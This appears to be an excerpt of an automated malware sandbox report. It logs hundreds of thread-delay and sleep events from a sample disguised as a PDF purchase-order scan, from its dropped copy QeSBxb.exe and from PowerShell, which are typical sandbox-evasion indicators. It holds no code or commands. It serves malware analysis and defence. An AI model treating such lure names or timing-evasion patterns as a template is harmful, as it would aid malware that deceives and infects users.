Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599470
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598452
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597792
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597434
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597327
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596451
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595784
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595546
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595431
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595304
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594994
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594326

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8091	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1582	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Window / User API: threadDelayed 3597	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Window / User API: threadDelayed 6209	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Window / User API: threadDelayed 2201
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Window / User API: threadDelayed 7661

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 1796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 6676	Thread sleep count: 3597 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 6676	Thread sleep count: 6209 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599653s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599211s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598806s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598680s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598466s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080	Thread sleep time: -593735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 3984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 6712	Thread sleep count: 2201 > 30
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 6712	Thread sleep count: 7661 > 30
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599470s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598452s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597792s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597577s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597434s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597327s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597218s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597108s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596451s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595784s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595656s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595546s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595431s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595304s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594994s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594546s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594437s >= -30000s
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668	Thread sleep time: -594326s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599211	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598806	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598680	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598466	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599875
